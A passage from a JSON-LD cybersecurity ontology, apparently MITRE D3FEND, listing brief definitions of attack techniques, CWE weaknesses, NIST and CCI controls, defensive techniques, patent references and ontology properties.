        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Probabilistic logic extends traditional logic truth tables with probabilistic expressions.",
      "d3f:kb-article": "## References\n1. Probabilistic logic. (2023, June 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Probabilistic_logic)",
      "rdfs:label": "Probabilistic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1452",
      "@type": "owl:Class",
      "d3f:attack-id": "T1452",
      "d3f:definition": "An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Manipulate App Store Rankings or Ratings - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Manipulate App Store Rankings or Ratings"
    },
    {
      "@id": "d3f:T0871",
      "@type": "owl:Class",
      "d3f:attack-id": "T0871",
      "d3f:definition": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.",
      "rdfs:label": "Execution through API - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Execution through API"
    },
    {
      "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://plc-security.com/"
      },
      "d3f:kb-abstract": "The aim of this project is to provide guidelines to engineers that are creating software (ladder logic, function charts etc.) to help improve the security posture of Industrial Control Systems.\n\nThese practices leverage natively available functionality in the PLC/DCS. Little to no additional software tools or hardware is needed to implement these practices. They can all be fit into the normal PLC programming and operating workflow. More than security expertise, good knowledge of the PLCs to be protected, their logic, and the underlying process is needed for implementing these practices.\n\nTo fit the scope of the Top 20 Secure PLC Coding practices list, practices need to involve changes made directly to a PLC.",
      "d3f:kb-organization": "PLC Security",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ApplicationExceptionMonitoring"
        },
        {
          "@id": "d3f:ApplicationPerformanceMonitoring"
        },
        {
          "@id": "d3f:OTVariableAccessRestriction"
        },
        {
          "@id": "d3f:PlatformUptimeMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Secure PLC Coding Practices: Top 20 List",
      "rdfs:label": "Reference - Secure PLC Coding Practices: Top 20 List"
    },
    {
      "@id": "d3f:T1055.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.003",
      "d3f:definition": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:may-add": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Thread Execution Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N7679dbb13d6643eaac8a2ac221c786d6"
        },
        {
          "@id": "_:Nb7b7bde918cf46d3ad5cde7ffb554cce"
        }
      ]
    },
    {
      "@id": "_:N7679dbb13d6643eaac8a2ac221c786d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:Nb7b7bde918cf46d3ad5cde7ffb554cce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:AverageAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AAD",
      "d3f:definition": "The average absolute deviation (AAD) of a data set is the average of the absolute deviations from a central point.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "rdfs:label": "Average Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:ClientComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A client computer is a host that accesses a service made available by a server. The server is often (but not always) on another computer system, in which case the client accesses the service by way of a network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Client_(computing)"
      },
      "rdfs:label": "Client Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Host_(network)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1583.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.007",
      "d3f:definition": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.",
      "rdfs:label": "Serverless",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:Reference-ThreatDetectionThroughTheAccumulatedDetectionOfThreatCharacteristics_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9104864B2/en?oq=US-9104864-B2"
      },
      "d3f:kb-abstract": "Embodiments of the present disclosure provide for improved capabilities in the detection of malware, where malware threats are detected through the accumulated identification of threat characteristics for targeted computer objects. Methods and systems include dynamic threat detection providing a first database that correlates a plurality of threat characteristics to a threat, wherein a presence of the plurality of the threat characteristics confirms a presence of the threat; detecting a change event in a computer run-time process; testing the change event for a presence of one or more of the plurality of characteristics upon detection of the change event; storing a detection of one of the plurality of characteristics in a second database that accumulates detected characteristics for the computer run-time process; and identifying the threat when each one of the plurality of characteristics appears in the second database.",
      "d3f:kb-author": "Clifford Penton; Irene Michlin",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Threat detection through the accumulated detection of threat characteristics",
      "rdfs:label": "Reference - Threat detection through the accumulated detection of threat characteristics - Sophos Ltd"
    },
    {
      "@id": "d3f:T0858",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T0858",
      "d3f:definition": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download.   Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Change Operating Mode - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "_:N2316c529ac4544fc9e26e70496feaafa"
        }
      ],
      "skos:prefLabel": "Change Operating Mode"
    },
    {
      "@id": "_:N2316c529ac4544fc9e26e70496feaafa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Reference-ModelingUserAccessToComputerResources_DaedalusGroupLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8214364B2"
      },
      "d3f:kb-abstract": "Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes.",
      "d3f:kb-author": "Joseph P. Bigus, Leon Gong, Christoph Lingenfelder",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Daedalus Group LLC (formerly IBM)",
      "d3f:kb-reference-of": {
        "@id": "d3f:ResourceAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "Modeling user access to computer resources",
      "rdfs:label": "Reference - Modeling user access to computer resources - Daedalus Group LLC (formerly IBM)"
    },
    {
      "@id": "d3f:FuzzyLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-FL",
      "d3f:definition": "Fuzzy logic is a form of many-valued logic in which the truth value of variables may be any real number between 0 and 1.",
      "d3f:kb-article": "## How it works\nIt is employed to handle the concept of partial truth, where the truth value may range between completely true and completely false.[1] By contrast, in Boolean logic, the truth values of variables may only be the integer values 0 or 1.\n\n## References\n1. Fuzzy logic. (2023, May 28). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Fuzzy_logic)",
      "rdfs:label": "Fuzzy Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Metadata",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(6)"
    },
    {
      "@id": "d3f:CWE-550",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-550",
      "d3f:definition": "Certain conditions, such as network failure, will cause a server error message to be displayed.",
      "rdfs:label": "Server-generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:T1556.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.006",
      "d3f:definition": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.",
      "rdfs:label": "Multi-Factor Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:identifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x identifies y: The entity x recognizes or brings attention to entity y, making it distinct or clear through naming, description, or discovery.",
      "rdfs:label": "identifies",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-002363_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a logout capability for user-initiated communications sessions whenever authentication is used to gain access to organization-defined information resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002363"
    },
    {
      "@id": "d3f:T1547.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.006",
      "d3f:definition": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) ",
      "d3f:modifies": {
        "@id": "d3f:KernelModule"
      },
      "rdfs:label": "Kernel Modules and Extensions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Naa46084a8ea04b68b7aeb962926d90c7"
        }
      ]
    },
    {
      "@id": "_:Naa46084a8ea04b68b7aeb962926d90c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:AML.T0010.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.001",
      "d3f:definition": "Most AI systems rely on a limited set of AI frameworks.\nAn adversary could get access to a large number of AI systems through a comprise of one of their supply chains.\nMany AI projects also rely on other open source implementations of various algorithms.\nThese can also be compromised in a targeted way to get access to specific systems.",
      "rdfs:label": "AI Software - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "AI Software"
    },
    {
      "@id": "d3f:CWE-1427",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1427",
      "d3f:definition": "The product uses externally-provided data to build prompts provided to large language models (LLMs), but the way these prompts are constructed causes the LLM to fail to distinguish between user-supplied inputs and developer provided system directives.",
      "d3f:synonym": "prompt injection",
      "rdfs:label": "Improper Neutralization of Input Used for LLM Prompting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:CWE-1076",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1076",
      "d3f:definition": "The product's architecture, source code, design, documentation, or other artifact does not follow required conventions.",
      "rdfs:label": "Insufficient Adherence to Expected Conventions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:erases",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x erases y: A technique x removes recorded data from storage device y creating space for new data.",
      "rdfs:label": "erases",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-001368_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for controlling the flow of information within the system based on organization-defined information flow control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001368"
    },
    {
      "@id": "d3f:Harden",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The harden tactic is used to increase the opportunity cost of computer network exploitation. Hardening differs from Detection in that it generally is conducted before a system is online and operational.",
      "d3f:display-order": 0,
      "d3f:display-priority": 0,
      "rdfs:label": "Harden",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-563",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-563",
      "d3f:definition": "The variable's value is assigned but never used, making it a dead store.",
      "d3f:synonym": "Unused Variable",
      "rdfs:label": "Assignment to Variable without Use",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Trusted Generation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:FirmwareVerification"
      },
      "rdfs:label": "SA-10(4)"
    },
    {
      "@id": "d3f:T1143",
      "@type": "owl:Class",
      "d3f:attack-id": "T1143",
      "d3f:definition": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.003",
      "rdfs:label": "Hidden Window",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OnboardComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:HardwareClock"
      },
      "d3f:definition": "A self-contained, embedded computing unit installed within a vehicle or other autonomous platform that executes real-time control, data-handling, and mission-management software. It interfaces directly with the platform's sensors, actuators, and communication links, processes and stores operational data, and issues commands to subsystems, enabling the system to function independently of external computing resources.",
      "d3f:may-contain": [
        {
          "@id": "d3f:FlashMemory"
        },
        {
          "@id": "d3f:HardwareWatchdogTimer"
        }
      ],
      "d3f:runs": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:FlightSoftware"
        },
        {
          "@id": "d3f:RealTimeOperatingSystem"
        }
      ],
      "d3f:synonym": "OBC",
      "rdfs:isDefinedBy": {
        "@id": "https://www.esa.int/Enabling_Support/Space_Engineering_Technology/Onboard_Computers_and_Data_Handling/Onboard_Computers"
      },
      "rdfs:label": "Onboard Computer",
      "rdfs:seeAlso": {
        "@id": "https://blog.satsearch.co/2020-03-11-an-overview-of-on-board-computer-obc-systems-available-on-the-global-space-marketplace"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N39d2b33a6dc1487f8c75b1c1a5a18e18"
        },
        {
          "@id": "_:Nf48aa5acf4a24e309619d6eaccfead06"
        },
        {
          "@id": "_:N23280bcc2f2a465699c618d4dd04c034"
        },
        {
          "@id": "_:N525ca9b221564d03996c1453cb32b919"
        },
        {
          "@id": "_:Nbeb0ae8d292b4bb1ad18be16eb62089f"
        },
        {
          "@id": "_:N44a41581ed42447d97f4fc047fc867e9"
        }
      ]
    },
    {
      "@id": "_:N39d2b33a6dc1487f8c75b1c1a5a18e18",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "_:Nf48aa5acf4a24e309619d6eaccfead06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlashMemory"
      }
    },
    {
      "@id": "_:N23280bcc2f2a465699c618d4dd04c034",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareWatchdogTimer"
      }
    },
    {
      "@id": "_:N525ca9b221564d03996c1453cb32b919",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:Nbeb0ae8d292b4bb1ad18be16eb62089f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlightSoftware"
      }
    },
    {
      "@id": "_:N44a41581ed42447d97f4fc047fc867e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RealTimeOperatingSystem"
      }
    },
    {
      "@id": "d3f:ContentQuarantine",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentQuarantine"
      ],
      "d3f:d3fend-id": "D3-CQ",
      "d3f:definition": "Transfer content that does not comply with policy to a quarantine zone.",
      "d3f:kb-article": "## How it works\n\nQuarantining serves as a protective measure to isolate potentially harmful files or elements until they can be safely analyzed or processed.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:quarantines": [
        {
          "@id": "d3f:DatabaseRecord"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "rdfs:label": "Content Quarantine",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "_:N235a420d641f411782ce920d5a02e231"
        },
        {
          "@id": "_:N801484492473439cb48f472716cf13b1"
        }
      ]
    },
    {
      "@id": "_:N235a420d641f411782ce920d5a02e231",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:quarantines"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseRecord"
      }
    },
    {
      "@id": "_:N801484492473439cb48f472716cf13b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:quarantines"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-772",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-772",
      "d3f:definition": "The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.",
      "rdfs:label": "Missing Release of Resource after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:semantic-relation",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x semantic-relation y: The entity x is conceptually or meaningfully connected to entity y.",
      "rdfs:label": "semantic-relation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Software-definedRadioConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The physical radio hardware parameters used by a software-defined radio (SDR), including center frequency, bandwidth, gain settings, antenna selection, ADC/DAC sample rates, filter characteristics, power output, and others.",
      "rdfs:label": "Software-defined Radio Configuration",
      "rdfs:seeAlso": {
        "@id": "https://www.analog.com/media/en/training-seminars/design-handbooks/Software-Defined-Radio-for-Engineers-2018/SDR4Engineers.pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002890_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of nonlocal maintenance and diagnostic communications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002890"
    },
    {
      "@id": "d3f:Transceiver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Receiver"
        },
        {
          "@id": "d3f:Transmitter"
        }
      ],
      "d3f:definition": "A transceiver is a device that contains both a transmitter and receiver.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.analog.com/en/resources/glossary/transceiver.html"
      },
      "rdfs:label": "Transceiver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N482d0e0851d747268fed078c58fdc039"
        },
        {
          "@id": "_:N532599ede4224f6885f1ec3c0a3d7398"
        }
      ]
    },
    {
      "@id": "_:N482d0e0851d747268fed078c58fdc039",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N532599ede4224f6885f1ec3c0a3d7398",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "d3f:CWE-276",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-276",
      "d3f:definition": "During installation, installed file permissions are set to allow anyone to modify those files.",
      "d3f:weakness-of": {
        "@id": "d3f:ApplicationInstaller"
      },
      "rdfs:label": "Incorrect Default Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-732"
        },
        {
          "@id": "_:Nc8fd26a6a54a46ff80c65f6dd1e583c8"
        }
      ]
    },
    {
      "@id": "_:Nc8fd26a6a54a46ff80c65f6dd1e583c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstaller"
      }
    },
    {
      "@id": "d3f:EXF-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0005",
      "d3f:definition": "A nearby vehicle serves as the collection platform for unintended emissions and other proximate signals, effectively a mobile TEMPEST/EMSEC sensor. From close range, the adversary measures near-field RF, conducted/structure-borne emissions, optical/IR signatures, or leaked crosslink traffic correlated with on-board activity, then decodes or models those signals to recover information (keys, tables, procedure execution, payload content). Proximity also enables directional gain and repeated sampling passes, turning weak side channels into usable exfiltration without engaging the victim’s logical interfaces.",
      "rdfs:label": "Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Proximity Operations"
    },
    {
      "@id": "d3f:Client-serverPayloadProfiling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Client-serverPayloadProfiling"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-CSPP",
      "d3f:definition": "Comparing client-server request and response payloads to a baseline profile to identify outliers.",
      "d3f:kb-article": "## How it works\nProfiling request and response payloads across multiple clients to a single server to develop a baseline of their characteristics. May take into account request/response sizes, entropy, frequency, and rhythm. Finally, identify outliers as they may indicate a malicious payload delivery and subsequent server exploitation.\n\n\n## Considerations\n* Collecting metrics to establish a profile can be challenging since user behavior can change easily.\n* Employees may work different hours or inconsistent schedules which will cause false positives.\n* Collection of network activity to generate metrics is a computationally intensive process.\n* Users may log into different workstations which may cause false positives.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndSystemForDetectingMaliciousPayloads_VectraNetworksInc"
      },
      "rdfs:label": "Client-server Payload Profiling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N7ba19ace775341feb92f69826755ffe7"
        }
      ]
    },
    {
      "@id": "_:N7ba19ace775341feb92f69826755ffe7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:IA-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009",
      "d3f:definition": "Adversaries obtain first execution by riding connections that the mission already trusts, formal interconnections with partners, vendors, and user communities. Once a third party is compromised, the actor inherits that entity’s approved routes into mission enclaves: VPNs and jump hosts into ground networks, API keys into cloud tenants, automated file drops that feed command or update pipelines, and collaboration spaces where procedures and dictionaries circulate. Because traffic, credentials, and artifacts originate from known counterparts, the initial execution event can appear as a routine payload task, scheduled procedure, or software update promoted through established processes.",
      "rdfs:label": "Trusted Relationship - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Trusted Relationship"
    },
    {
      "@id": "d3f:T1218.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.015",
      "d3f:definition": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)",
      "rdfs:label": "Electron Applications",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:T1656",
      "@type": "owl:Class",
      "d3f:attack-id": "T1656",
      "d3f:definition": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.",
      "rdfs:label": "Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Repository",
      "@type": "owl:Class",
      "d3f:definition": "A centralized digital storage location where code, files, and related resources are systematically organized, managed, and maintained.",
      "rdfs:isDefinedBy": {
        "@id": "https://phoenixnap.com/glossary/what-is-a-repository"
      },
      "rdfs:label": "Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CCI-002322_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
